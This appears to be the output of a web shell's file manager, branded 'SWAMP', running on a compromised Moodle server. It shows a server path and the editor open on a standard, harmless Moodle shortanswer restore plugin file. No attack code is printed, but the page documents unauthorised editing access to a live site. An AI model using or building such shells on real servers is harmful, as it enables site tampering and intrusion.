░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/moodle/public/question/type/shortanswer/backup/moodle2
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: restore_qtype_shortanswer_plugin.class.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * @package moodlecore * @subpackage backup-moodle2 * @copyright 2010 onwards Eloy Lafuente (stronk7) {@link http://stronk7.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); global $CFG; require_once($CFG->dirroot . '/backup/moodle2/restore_qtype_extrafields_plugin.class.php'); /** * Restore plugin class that provides the necessary information * needed to restore one shortanswer qtype plugin * * @copyright 2010 onwards Eloy Lafuente (stronk7) {@link http://stronk7.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class restore_qtype_shortanswer_plugin extends restore_qtype_extrafields_plugin { /** * Process the qtype/shortanswer element */ public function process_shortanswer($data) { $this->really_process_extra_question_fields($data); } }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 backup_qtype_shortanswer_plugin.class.php
PHP
1.2 KB
2026-02-11 01:44
EDIT
📄 restore_qtype_shortanswer_plugin.class.php
PHP
1.5 KB
2026-02-11 01:44
EDIT